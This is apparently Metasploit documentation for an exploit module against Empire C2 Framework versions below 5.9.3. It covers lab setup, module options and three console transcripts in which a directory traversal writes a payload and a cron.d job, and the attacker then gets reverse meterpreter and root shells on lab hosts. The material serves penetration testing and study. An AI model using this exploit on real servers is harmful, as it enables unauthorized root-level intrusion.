metasploit-gs/documentation/modules/exploit/linux/http/empire_skywalker.md

Vulnerable Application

This module exploits a directory traversal vulnerability in Empire C2 Framework (<5.9.3) and writes the payload to /tmp/ directory followed by a cron.d file to execute the payload.

The vulnerability affects:

* Empire C2 Framework (<5.9.3)

This module was successfully tested on:

* Empire C2 Framework (v5.9.2) on Kali Linux 6.6.15
* Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15

Install and run the vulnerable Empire

1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
2. Install Kali Linux (or other Linux distro) in your virtualization engine.
3. Pull pre-built Empire docker container (<5.9.3) in your VM. docker pull bcsecurity/empire:v5.9.2
4. Run the server and the client on the same VM.
5. Run the server. docker run -it --net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d bcsecurity/empire:v5.9.2 (--net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d is not realistic but for simplicity.)
6. Run the client. docker run -it --net="host" bcsecurity/empire:v5.9.2 client
7. Execute Empire listener on client.

uselistener http
set Host <rhost>
set Port <port>
execute

Verification Steps

1. Install the application
2. Start msfconsole
3. Do: use exploit/linux/http/empire_skywalker
4. Do: set rhost <rhost>
5. Do: set rport <port>
6. Do: set lhost <attacker-ip>
7. Do: run
8. Have the generated request processed by a vulnerable version of Empire
9. You should get a shell or meterpreter

Options

STAGE_PATH (required)

This is the Empire's default staging path. Default is login/process.php. (reference)

PROFILE (required)

This is the Empire's default communication profile agent. Default is Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko (reference)

Scenarios

Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 0, port 80)

msf6 > use exploit/linux/http/empire_skywalker
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.7
rhost => 192.168.56.7
msf6 exploit(linux/http/empire_skywalker) > set rport 80
rport => 80
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.7:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/NYLkIKRK
[*] Writing cron job to /etc/cron.d/AeVTTPiZ
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (24772 bytes) to 192.168.56.7
[+] Deleted /etc/cron.d/AeVTTPiZ
[+] Deleted /tmp/NYLkIKRK
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:48026) at 2024-07-20 11:32:03 +0900
[!] This exploit may require manual cleanup of '/var/lib/powershell-empire/empire/server/downloads/LML47FWS/agent.log' on the target

meterpreter > sysinfo
Computer        : kali
OS              : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux

Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)

msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set target 1
target => 1
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/jJzYkeKV
[*] Writing cron job to /etc/cron.d/nFnFIbim
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (36 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/nFnFIbim
[+] Deleted /tmp/jJzYkeKV
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/WV9TEJTE/agent.log, unknown result
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:42068) at 2024-07-20 14:40:09 +0900

whoami
root

Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)

msf6 > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf6 exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf6 exploit(linux/http/empire_skywalker) > set target 2
target => 2
msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf6 exploit(linux/http/empire_skywalker) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/qxlOSIYF
[*] Writing cron job to /etc/cron.d/ugrYIJzf
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/ugrYIJzf
[+] Deleted /tmp/qxlOSIYF
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/JJR8EMKK/agent.log, unknown result
[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:46040) at 2024-07-20 14:44:09 +0900

whoami
root